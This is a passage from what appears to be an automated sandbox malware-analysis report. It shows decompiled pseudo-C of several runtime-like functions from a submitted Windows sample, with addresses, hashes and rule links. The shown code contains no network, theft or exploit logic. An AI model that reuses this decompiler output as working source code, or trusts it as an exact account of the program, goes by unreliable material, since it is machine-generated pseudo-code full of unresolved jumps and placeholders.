				 *_t240 = dil;
				if (_t203 - 0x3e8 < 0) goto 0x35c5c598;
				_t232 =  &(_t240[0]);
				_t212 = (_t200 - _t246 >> 7) + (_t200 - _t246 >> 7 >> 0x3f);
				 *_t240 = _t218 + _t212;
				_t204 = _t203 + _t212 * 0xfffffc18;
				if (_t232 != _t240) goto 0x35c5c59e;
				if (_t204 - 0x64 < 0) goto 0x35c5c5d1;
				_t215 = (_t212 + _t204 >> 6) + (_t212 + _t204 >> 6 >> 0x3f);
				 *_t232 = _t218 + _t215;
				_t233 =  &(_t232[0]);
				if (_t233 != _t240) goto 0x35c5c5d7;
				if (_t204 + _t215 * 0xffffff9c - 0xa < 0) goto 0x35c5c602;
				 *_t233 = _t218 + (_t215 >> 2) + (_t215 >> 2 >> 0x3f);
				_t234 =  &(_t233[0]);
				 *_t234 = (_t88 & 0x000007ff) + dil;
				_t234[0] = r11b;
				return 0;
			}













































                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c278
                                                                                                                                                                                                                              0x7ff735c5c27d
                                                                                                                                                                                                                              0x7ff735c5c282
                                                                                                                                                                                                                              0x7ff735c5c29b
                                                                                                                                                                                                                              0x7ff735c5c2a0
                                                                                                                                                                                                                              0x7ff735c5c2a9
                                                                                                                                                                                                                              0x7ff735c5c2ac
                                                                                                                                                                                                                              0x7ff735c5c2af
                                                                                                                                                                                                                              0x7ff735c5c2b2
                                                                                                                                                                                                                              0x7ff735c5c2bb
                                                                                                                                                                                                                              0x7ff735c5c2bd
                                                                                                                                                                                                                              0x7ff735c5c2c5
                                                                                                                                                                                                                              0x7ff735c5c2c9
                                                                                                                                                                                                                              0x7ff735c5c2ce
                                                                                                                                                                                                                              0x7ff735c5c2d1
                                                                                                                                                                                                                              0x7ff735c5c2d4
                                                                                                                                                                                                                              0x7ff735c5c2db
                                                                                                                                                                                                                              0x7ff735c5c2df
                                                                                                                                                                                                                              0x7ff735c5c2e4
                                                                                                                                                                                                                              0x7ff735c5c2eb
                                                                                                                                                                                                                              0x7ff735c5c305
                                                                                                                                                                                                                              0x7ff735c5c316
                                                                                                                                                                                                                              0x7ff735c5c328
                                                                                                                                                                                                                              0x7ff735c5c333
                                                                                                                                                                                                                              0x7ff735c5c337
                                                                                                                                                                                                                              0x7ff735c5c33f
                                                                                                                                                                                                                              0x7ff735c5c344
                                                                                                                                                                                                                              0x7ff735c5c348
                                                                                                                                                                                                                              0x7ff735c5c354
                                                                                                                                                                                                                              0x7ff735c5c356
                                                                                                                                                                                                                              0x7ff735c5c359
                                                                                                                                                                                                                              0x7ff735c5c363
                                                                                                                                                                                                                              0x7ff735c5c366
                                                                                                                                                                                                                              0x7ff735c5c36e
                                                                                                                                                                                                                              0x7ff735c5c384
                                                                                                                                                                                                                              0x7ff735c5c386
                                                                                                                                                                                                                              0x7ff735c5c38a
                                                                                                                                                                                                                              0x7ff735c5c397
                                                                                                                                                                                                                              0x7ff735c5c399
                                                                                                                                                                                                                              0x7ff735c5c39b
                                                                                                                                                                                                                              0x7ff735c5c3a8
                                                                                                                                                                                                                              0x7ff735c5c3ae
                                                                                                                                                                                                                              0x7ff735c5c3b4
                                                                                                                                                                                                                              0x7ff735c5c3b8
                                                                                                                                                                                                                              0x7ff735c5c3c1
                                                                                                                                                                                                                              0x7ff735c5c3e6
                                                                                                                                                                                                                              0x7ff735c5c3e8
                                                                                                                                                                                                                              0x7ff735c5c3f4
                                                                                                                                                                                                                              0x7ff735c5c3f7
                                                                                                                                                                                                                              0x7ff735c5c3fe
                                                                                                                                                                                                                              0x7ff735c5c400
                                                                                                                                                                                                                              0x7ff735c5c403
                                                                                                                                                                                                                              0x7ff735c5c409
                                                                                                                                                                                                                              0x7ff735c5c40e
                                                                                                                                                                                                                              0x7ff735c5c410
                                                                                                                                                                                                                              0x7ff735c5c41c
                                                                                                                                                                                                                              0x7ff735c5c421
                                                                                                                                                                                                                              0x7ff735c5c426
                                                                                                                                                                                                                              0x7ff735c5c433
                                                                                                                                                                                                                              0x7ff735c5c433
                                                                                                                                                                                                                              0x7ff735c5c445
                                                                                                                                                                                                                              0x7ff735c5c447
                                                                                                                                                                                                                              0x7ff735c5c44e
                                                                                                                                                                                                                              0x7ff735c5c467
                                                                                                                                                                                                                              0x7ff735c5c475
                                                                                                                                                                                                                              0x7ff735c5c479
                                                                                                                                                                                                                              0x7ff735c5c47d
                                                                                                                                                                                                                              0x7ff735c5c482
                                                                                                                                                                                                                              0x7ff735c5c484
                                                                                                                                                                                                                              0x7ff735c5c486
                                                                                                                                                                                                                              0x7ff735c5c491
                                                                                                                                                                                                                              0x7ff735c5c493
                                                                                                                                                                                                                              0x7ff735c5c495
                                                                                                                                                                                                                              0x7ff735c5c49d
                                                                                                                                                                                                                              0x7ff735c5c4a7
                                                                                                                                                                                                                              0x7ff735c5c4ac
                                                                                                                                                                                                                              0x7ff735c5c4b1
                                                                                                                                                                                                                              0x7ff735c5c4b3
                                                                                                                                                                                                                              0x7ff735c5c4be
                                                                                                                                                                                                                              0x7ff735c5c4c0
                                                                                                                                                                                                                              0x7ff735c5c4c3
                                                                                                                                                                                                                              0x7ff735c5c4c6
                                                                                                                                                                                                                              0x7ff735c5c4cb
                                                                                                                                                                                                                              0x7ff735c5c4d0
                                                                                                                                                                                                                              0x7ff735c5c4d2
                                                                                                                                                                                                                              0x7ff735c5c4d6
                                                                                                                                                                                                                              0x7ff735c5c4db
                                                                                                                                                                                                                              0x7ff735c5c4de
                                                                                                                                                                                                                              0x7ff735c5c4e0
                                                                                                                                                                                                                              0x7ff735c5c4e3
                                                                                                                                                                                                                              0x7ff735c5c4ed
                                                                                                                                                                                                                              0x7ff735c5c4ef
                                                                                                                                                                                                                              0x7ff735c5c4f2
                                                                                                                                                                                                                              0x7ff735c5c4ff
                                                                                                                                                                                                                              0x7ff735c5c507
                                                                                                                                                                                                                              0x7ff735c5c50a
                                                                                                                                                                                                                              0x7ff735c5c515
                                                                                                                                                                                                                              0x7ff735c5c519
                                                                                                                                                                                                                              0x7ff735c5c51d
                                                                                                                                                                                                                              0x7ff735c5c521
                                                                                                                                                                                                                              0x7ff735c5c524
                                                                                                                                                                                                                              0x7ff735c5c52b
                                                                                                                                                                                                                              0x7ff735c5c53c
                                                                                                                                                                                                                              0x7ff735c5c541
                                                                                                                                                                                                                              0x7ff735c5c54f
                                                                                                                                                                                                                              0x7ff735c5c552
                                                                                                                                                                                                                              0x7ff735c5c555
                                                                                                                                                                                                                              0x7ff735c5c558
                                                                                                                                                                                                                              0x7ff735c5c562
                                                                                                                                                                                                                              0x7ff735c5c56e
                                                                                                                                                                                                                              0x7ff735c5c580
                                                                                                                                                                                                                              0x7ff735c5c586
                                                                                                                                                                                                                              0x7ff735c5c590
                                                                                                                                                                                                                              0x7ff735c5c596
                                                                                                                                                                                                                              0x7ff735c5c59c
                                                                                                                                                                                                                              0x7ff735c5c5b9
                                                                                                                                                                                                                              0x7ff735c5c5bf
                                                                                                                                                                                                                              0x7ff735c5c5c2
                                                                                                                                                                                                                              0x7ff735c5c5cf
                                                                                                                                                                                                                              0x7ff735c5c5d5
                                                                                                                                                                                                                              0x7ff735c5c5f5
                                                                                                                                                                                                                              0x7ff735c5c5f8
                                                                                                                                                                                                                              0x7ff735c5c605
                                                                                                                                                                                                                              0x7ff735c5c608
                                                                                                                                                                                                                              0x7ff735c5c62b

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                                              • String ID: gfffffff
                                                                                                                                                                                                                              • API String ID: 0-1523873471
                                                                                                                                                                                                                              • Opcode ID: 29bdbe93243fcf93bcc94fe886d6bd57c0908aa2298b28d0adb6942428404ecc
                                                                                                                                                                                                                              • Instruction ID: ef9da4e48747492f84cbf220c363eff82c9dc15707ce882d5b4aa9fba948d479
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: 29bdbe93243fcf93bcc94fe886d6bd57c0908aa2298b28d0adb6942428404ecc
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: DDA158A3B083C756EB22DB669000BBEB791EB50B88F858531DE4D47785DE3CE909E711
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C56BA0 Relevance: 1.4, Strings: 1, Instructions: 177COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                                                                                              			E00007FF77FF735C56BA0(long long __rbx, void* __rcx, void* __rdx, long long __rsi) {
				void* _t14;
				void* _t22;
				intOrPtr* _t53;
				signed long long _t55;
				void* _t72;
				long long _t85;
				intOrPtr* _t89;
				void* _t93;
				void* _t94;
				long long _t96;
				signed long long _t98;
				signed long long _t99;
				void* _t101;

				_t71 = __rdx;
				_t53 = _t89;
				 *((long long*)(_t53 + 0x10)) = __rbx;
				 *((long long*)(_t53 + 0x18)) = _t85;
				 *((long long*)(_t53 + 0x20)) = __rsi;
				_t94 = __rdx;
				r13d = 0;
				 *((long long*)(_t53 + 8)) = _t96;
				_t14 = E00007FF77FF735C5FC18();
				if (_t14 == 0) goto 0x35c56bed;
				if (_t14 == 0x16) goto 0x35c56da9;
				goto 0x35c56c42;
				if ( *((intOrPtr*)(_t89 - 0x30 + 0x60)) == 0) goto 0x35c56c42;
				if (E00007FF77FF735C5FCC4(0,  *((intOrPtr*)(_t89 - 0x30 + 0x60))) != 0) goto 0x35c56c10;
				_t58 = _t96;
				goto 0x35c56c79;
				E00007FF77FF735C56ED4(_t96, _t96, __rdx,  *((intOrPtr*)(_t89 - 0x30 + 0x60)), _t101);
				if (_t53 == 0) goto 0x35c56c3a;
				if (E00007FF77FF735C5FCC4(0, _t53) != 0) goto 0x35c56c3a;
				E00007FF77FF735C59468(_t53, _t53);
				goto 0x35c56c79;
				E00007FF77FF735C59468(_t53, _t53);
				if (_t53 == 0) goto 0x35c56c5a;
				if (E00007FF77FF735C5FCC4(0, _t53) != 0) goto 0x35c56c5a;
				goto 0x35c56c76;
				if (E00007FF77FF735C5FCC4(0, 0x35c6fce4) == 0) goto 0x35c56c76;
				_t22 = E00007FF77FF735C59468(_t53, _t96);
				_t99 = _t98 | 0xffffffff;
				if (_t94 == 0) goto 0x35c56c99;
				if ( *((intOrPtr*)(_t94 + (_t99 + 1) * 2)) != r13w) goto 0x35c56c8d;
				goto 0x35c56c9c;
				_t55 = _t99 + 1;
				if ( *((intOrPtr*)(0x35c6fce8 + _t55 * 2)) != r13w) goto 0x35c56c9f;
				r15d = _t22 + 0xc + r13d;
				0x35c53774(_t98, _t96, _t93, _t72);
				if (_t55 != 0) goto 0x35c56cf3;
				E00007FF77FF735C5377C(0, _t58, _t71, 0x35c6fcf0);
				E00007FF77FF735C59468(_t55, _t96);
				return 0;
			}
















                                                                                                                                                                                                                              0x7ff735c56ba0
                                                                                                                                                                                                                              0x7ff735c56ba0
                                                                                                                                                                                                                              0x7ff735c56ba3
                                                                                                                                                                                                                              0x7ff735c56ba7
                                                                                                                                                                                                                              0x7ff735c56bab
                                                                                                                                                                                                                              0x7ff735c56bbc
                                                                                                                                                                                                                              0x7ff735c56bc9
                                                                                                                                                                                                                              0x7ff735c56bce
                                                                                                                                                                                                                              0x7ff735c56bd6
                                                                                                                                                                                                                              0x7ff735c56bdd
                                                                                                                                                                                                                              0x7ff735c56be2
                                                                                                                                                                                                                              0x7ff735c56beb
                                                                                                                                                                                                                              0x7ff735c56bf5
                                                                                                                                                                                                                              0x7ff735c56c03
                                                                                                                                                                                                                              0x7ff735c56c0b
                                                                                                                                                                                                                              0x7ff735c56c0e
                                                                                                                                                                                                                              0x7ff735c56c13
                                                                                                                                                                                                                              0x7ff735c56c1e
                                                                                                                                                                                                                              0x7ff735c56c2c
                                                                                                                                                                                                                              0x7ff735c56c30
                                                                                                                                                                                                                              0x7ff735c56c38
                                                                                                                                                                                                                              0x7ff735c56c3d
                                                                                                                                                                                                                              0x7ff735c56c45
                                                                                                                                                                                                                              0x7ff735c56c53
                                                                                                                                                                                                                              0x7ff735c56c58
                                                                                                                                                                                                                              0x7ff735c56c6d
                                                                                                                                                                                                                              0x7ff735c56c7c
                                                                                                                                                                                                                              0x7ff735c56c81
                                                                                                                                                                                                                              0x7ff735c56c88
                                                                                                                                                                                                                              0x7ff735c56c95
                                                                                                                                                                                                                              0x7ff735c56c97
                                                                                                                                                                                                                              0x7ff735c56c9f
                                                                                                                                                                                                                              0x7ff735c56ca7
                                                                                                                                                                                                                              0x7ff735c56cb5
                                                                                                                                                                                                                              0x7ff735c56cb8
                                                                                                                                                                                                                              0x7ff735c56cc3
                                                                                                                                                                                                                              0x7ff735c56cc7
                                                                                                                                                                                                                              0x7ff735c56ccf
                                                                                                                                                                                                                              0x7ff735c56cf2

                                                                                                                                                                                                                              Strings
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                              • String ID: TMP
                                                                                                                                                                                                                              • API String ID: 3215553584-3125297090
                                                                                                                                                                                                                              • Opcode ID: ab555ce38e679330a0184ca2037e43cf7df5178de496e0acb8d43cadb31624da
                                                                                                                                                                                                                              • Instruction ID: 0f949c04ef2072be7de78896b0489176e10d9bab973007e3695c43298284311c
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: ab555ce38e679330a0184ca2037e43cf7df5178de496e0acb8d43cadb31624da
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2B51A1D3B0821361FA68BAA7951117AD290AF44FCCF884C35DD0E477D6DE3CF481A2A0
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C61AEC Relevance: 1.3, APIs: 1, Instructions: 7memoryCOMMON
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                                                              			E00007FF77FF735C61AEC(long long __rax) {
				signed int _t3;

				_t3 = GetProcessHeap();
				 *0x35c8b270 = __rax;
				return _t3 & 0xffffff00 | __rax != 0x00000000;
			}




                                                                                                                                                                                                                              0x7ff735c61af0
                                                                                                                                                                                                                              0x7ff735c61af9
                                                                                                                                                                                                                              0x7ff735c61b07

                                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                                              • Source File: 00000000.00000002.454572575.00007FF735C41000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF735C40000, based on PE: true
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454563406.00007FF735C40000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454600190.00007FF735C69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C7B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454618472.00007FF735C8A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              • Associated: 00000000.00000002.454637784.00007FF735C8F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_7ff735c40000_PAP46E1UkZ.jbxd
                                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                                              • API ID: HeapProcess
                                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                                              • API String ID: 54951025-0
                                                                                                                                                                                                                              • Opcode ID: e3f698eda2a1841b5b07d0d59fdaba7d2d27f981482bb21e0863a53183718e2d
                                                                                                                                                                                                                              • Instruction ID: 10b754fd6c0af4a70ac321d755fb60fba72334961a8d7e1ca8f6813eacaed7d9
                                                                                                                                                                                                                              • Opcode Fuzzy Hash: e3f698eda2a1841b5b07d0d59fdaba7d2d27f981482bb21e0863a53183718e2d
                                                                                                                                                                                                                              • Instruction Fuzzy Hash: 76B09221E0BA07D2EA083B216C86219A2A87F89B18FD80178C00C40320DF2C21AAA724
                                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                                              Function 00007FF735C52314 Relevance: .3, Instructions: 339COMMONCrypto
                                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                                              C-Code - Quality: 56%
                                                                                                                                                                                                                              			E00007FF77FF735C52314(long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __rbp, void* __r8, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v56;
				short _v64;
				short _v68;
				signed short _v72;
				long long _v88;
				void* __rdi;
				signed int _t124;
				void* _t127;
				void* _t159;
				void* _t166;
				unsigned int _t167;
				signed char _t168;
				signed int _t179;
				signed short _t191;
				void* _t194;
				void* _t198;
				signed long long _t259;
				long long _t277;
				long long _t279;
				long long _t280;
				intOrPtr* _t282;
				intOrPtr _t286;
				intOrPtr* _t288;
				signed long long _t294;
				intOrPtr _t297;
				intOrPtr _t299;
				void* _t301;
				signed int* _t302;
				long long _t305;
				void* _t307;
				signed long long _t308;
				intOrPtr _t311;
				signed long long _t318;
				void* _t319;
				intOrPtr* _t321;

				_t305 = __rbp;
				_t303 = __rsi;
				_t279 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t308 = _t307 - 0x50;
				_t259 =  *0x35c7b008; // 0x861d85c91f07
				_v56 = _t259 ^ _t308;
				_t124 =  *(__rcx + 0x3a) & 0x0000ffff;
				_t277 = __rcx;
				_t6 = _t301 - 0x20; // 0x58
				_t191 = _t6;
				_t7 = _t301 - 0x77; // 0x1
				r12d = _t7;
				_t198 = _t124 - 0x64;
				if (_t198 > 0) goto 0x35c523ca;
				if (_t198 == 0) goto 0x35c5243b;
				if (_t124 == 0x41) goto 0x35c52448;
				if (_t124 == 0x43) goto 0x35c523a7;
				if (_t124 - 0x44 <= 0) goto 0x35c52453;
				if (_t124 - 0x47 <= 0) goto 0x35c52448;
				if (_t124 == 0x53) goto 0x35c523fd;
				if (_t124 == _t191) goto 0x35c523bd;
				if (_t124 == 0x5a) goto 0x35c523b3;
				if (_t124 == 0x61) goto 0x35c52448;
				if (_t124 != 0x63) goto 0x35c52453;
				E00007FF77FF735C52DD4(_t124 - 0x63, __rcx, __rcx, __rsi);
				goto 0x35c5244d;
				E00007FF77FF735C527E8(_t166, __rcx, __rcx, _t303);
				goto 0x35c5244d;
				_t127 = E00007FF77FF735C50B24(r12b, __rcx, __rcx, _t303, __rbp);
				goto 0x35c5244d;
				if (_t127 - 0x67 <= 0) goto 0x35c52448;
				if (_t127 == 0x69) goto 0x35c5243b;
				if (_t127 == 0x6e) goto 0x35c52434;
				if (_t127 == 0x6f) goto 0x35c52414;
				if (_t127 == 0x70) goto 0x35c52404;
				if (_t127 == 0x73) goto 0x35c523fd;
				if (_t127 == 0x75) goto 0x35c5243f;
				if (_t127 != 0x78) goto 0x35c52453;
				goto 0x35c523c0;
				E00007FF77FF735C52FE4(__rcx, __rcx, _t303);
				goto 0x35c5244d;
				 *((intOrPtr*)(_t279 + 0x30)) = 0x10;
				 *((intOrPtr*)(_t279 + 0x34)) = 0xb;
				goto 0x35c523bd;
				_t167 =  *(_t279 + 0x28);
				if ((r12b & _t167 >> 0x00000005) == 0) goto 0x35c52428;
				asm("bts ecx, 0x7");
				 *(_t277 + 0x28) = _t167;
				_t280 = _t277;
				E00007FF77FF735C5037C(0, _t277, _t280, _t303, _t305);
				goto 0x35c5244d;
				E00007FF77FF735C52E98(_t277, _t280);
				goto 0x35c5244d;
				 *(_t280 + 0x28) =  *(_t280 + 0x28) | 0x00000010;
				E00007FF77FF735C50750(0, _t277, _t280, _t303, _t305);
				goto 0x35c5244d;
				if (E00007FF77FF735C52AB0(0, 0x78, _t277, _t280, _t305) != 0) goto 0x35c5245a;
				goto 0x35c52745;
				if ( *((intOrPtr*)(_t277 + 0x38)) != bpl) goto 0x35c52742;
				_t168 =  *(_t277 + 0x28);
				_v68 = 0;
				_v64 = 0;
				r13d = 0x20;
				if ((r12b & 0) == 0) goto 0x35c524b8;
				if ((r12b & 0) == 0) goto 0x35c5249a;
				_v68 = _t319 + 0xd;
				goto 0x35c524b5;
				if ((r12b & _t168) == 0) goto 0x35c524a6;
				goto 0x35c52493;
				if ((r12b & 0) == 0) goto 0x35c524b8;
				_v68 = r13w;
				_t294 = _t318;
				r8d =  *(_t277 + 0x3a) & 0x0000ffff;
				r10d = 0xffdf;
				if ((r10w & (r8w & 0xffffffff) - _t191) != 0) goto 0x35c524dd;
				r9b = r12b;
				if ((r12b & 0) != 0) goto 0x35c524e0;
				r9b = bpl;
				r15d = 0x30;
				if (r9b != 0) goto 0x35c524fa;
				if (0 == 0) goto 0x35c52519;
				 *((intOrPtr*)(_t308 + 0x34 + _t294 * 2)) = r15w;
				if (r8w == _t191) goto 0x35c5250d;
				if (r8w != 0x41) goto 0x35c52510;
				 *((short*)(_t308 + 0x36 + _t294 * 2)) = _t191 & 0x0000ffff;
				_t194 =  *((intOrPtr*)(_t277 + 0x2c)) -  *(_t277 + 0x48);
				if ((_t168 & 0x0000000c) != 0) goto 0x35c52586;
				r9d = 0;
				if (_t194 <= 0) goto 0x35c52586;
				_t311 =  *((intOrPtr*)(_t277 + 0x460));
				if ( *((intOrPtr*)(_t311 + 0x10)) !=  *((intOrPtr*)(_t311 + 8))) goto 0x35c52553;
				if ( *((intOrPtr*)(_t311 + 0x18)) == bpl) goto 0x35c5254b;
				goto 0x35c5254e;
				 *(_t277 + 0x20) =  *(_t277 + 0x20) + 0x00000001 | 0xffffffff;
				goto 0x35c52579;
				 *(_t277 + 0x20) = _t280 + 1;
				 *((intOrPtr*)(_t311 + 0x10)) =  *((intOrPtr*)(_t311 + 0x10)) + _t318;
				 *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x460)))))) = r13w;
				 *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) =  *((long long*)( *((intOrPtr*)(_t277 + 0x460)))) + 2;
				if ( *(_t277 + 0x20) == 0xffffffff) goto 0x35c52586;
				r9d = r9d + r12d;
				if (r9d - _t194 < 0) goto 0x35c52530;
				_t302 = _t277 + 0x20;
				r8d = 0;
				_v88 =  *((intOrPtr*)(_t277 + 8));
				_t321 = _t277 + 0x460;
				_t282 = _t321;
				E00007FF77FF735C5321C(_t280 + 1, _t194, _t277, _t282, _t303, _t305, _t302);
				if ((r12b & 0) == 0) goto 0x35c52612;
				if ((r12b &  *(_t277 + 0x28) >> 0x00000002) != 0) goto 0x35c52612;
				r8d = 0;
				if (_t194 <= 0) goto 0x35c52612;
				_t297 =  *_t321;
				if ( *((intOrPtr*)(_t297 + 0x10)) !=  *((intOrPtr*)(_t297 + 8))) goto 0x35c525e9;
				if ( *((intOrPtr*)(_t297 + 0x18)) == bpl) goto 0x35c525e2;
				goto 0x35c525e5;
				 *_t302 =  *_t302 + 0x00000001 | 0xffffffff;
				goto 0x35c52605;
				 *_t302 = _t282 + 1;
				 *((intOrPtr*)(_t297 + 0x10)) =  *((intOrPtr*)(_t297 + 0x10)) + _t318;
				 *((intOrPtr*)( *((intOrPtr*)( *_t321)))) = r15w;
				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
				if ( *_t302 == 0xffffffff) goto 0x35c52612;
				r8d = r8d + r12d;
				if (r8d - _t194 < 0) goto 0x35c525cb;
				if ( *((intOrPtr*)(_t277 + 0x4c)) != bpl) goto 0x35c526f4;
				if ( *(_t277 + 0x48) <= 0) goto 0x35c526f4;
				_t320 =  *((intOrPtr*)(_t277 + 8));
				if ( *((intOrPtr*)( *((intOrPtr*)(_t277 + 8)) + 0x28)) != bpl) goto 0x35c5263c;
				E00007FF77FF735C53100( *_t321, _t277,  *((intOrPtr*)(_t277 + 8)), _t303);
				r9d = 0;
				if ( *(_t277 + 0x48) == 0) goto 0x35c526b9;
				_v72 = r9w;
				_t159 = E00007FF77FF735C5D240( *_t302, 0, _t277,  &_v72,  *((intOrPtr*)(_t277 + 0x40)), _t302, _t303, _t305,  *((intOrPtr*)( *((intOrPtr*)(_t320 + 0x18)) + 8)),  *((intOrPtr*)(_t277 + 8)));
				r9d = 0;
				if (_t159 <= 0) goto 0x35c526ee;
				_t286 =  *_t321;
				if ( *((intOrPtr*)(_t286 + 0x10)) !=  *((intOrPtr*)(_t286 + 8))) goto 0x35c52694;
				if ( *((intOrPtr*)(_t286 + 0x18)) == r9b) goto 0x35c5268e;
				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
				goto 0x35c526ac;
				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
				goto 0x35c526ac;
				 *(_t277 + 0x20) =  *(_t277 + 0x20) + r12d;
				 *((intOrPtr*)(_t286 + 0x10)) =  *((intOrPtr*)(_t286 + 0x10)) + _t318;
				 *((short*)( *((intOrPtr*)( *_t321)))) = _v72 & 0x0000ffff;
				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
				if (0 + r12d !=  *(_t277 + 0x48)) goto 0x35c52647;
				r13d = 0x20;
				_t179 =  *_t302;
				if (_t179 < 0) goto 0x35c52742;
				if ((r12b & 0) == 0) goto 0x35c52742;
				r8d = 0;
				if (_t194 <= 0) goto 0x35c52742;
				_t299 =  *_t321;
				if ( *((intOrPtr*)(_t299 + 0x10)) !=  *((intOrPtr*)(_t299 + 8))) goto 0x35c52719;
				if ( *((intOrPtr*)(_t299 + 0x18)) == bpl) goto 0x35c52712;
				goto 0x35c52715;
				 *(_t277 + 0x20) =  *(_t277 + 0x20) | 0xffffffff;
				goto 0x35c526b7;
				r8d =  *(_t277 + 0x48);
				_t288 = _t321;
				_v88 =  *((intOrPtr*)(_t277 + 8));
				E00007FF77FF735C5321C( *(_t277 + 0x28) >> 2, _t194, _t277, _t288, _t303, _t305, _t302);
				goto 0x35c526bf;
				 *_t302 = _t179 + 0x00000001 | 0xffffffff;
				goto 0x35c52735;
				 *_t302 = _t288 + 1;
				 *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) =  *((intOrPtr*)( *((intOrPtr*)(_t277 + 0x40)) + 0x10)) + _t318;
				 *((intOrPtr*)( *((intOrPtr*)( *_t321)))) = r13w;
				 *((long long*)( *_t321)) =  *((long long*)( *_t321)) + 2;
				if ( *_t302 == 0xffffffff) goto 0x35c52742;
				r8d = r8d + r12d;
				if (r8d - _t194 < 0) goto 0x35c526d7;
				return E00007FF77FF735C4A410(r12b,  *_t302, _v56 ^ _t308);
			}







































                                                                                                                                                                                                                              0x7ff735c52314
                                                                                                                                                                                                                              0x7ff735c52314
                                                                                                                                                                                                                              0x7ff735c52314
                                                                                                                                                                                                                              0x7ff735c52314
                                                                                                                                                                                                                              0x7ff735c52319
                                                                                                                                                                                                                              0x7ff735c5231e
                                                                                                                                                                                                                              0x7ff735c5232c
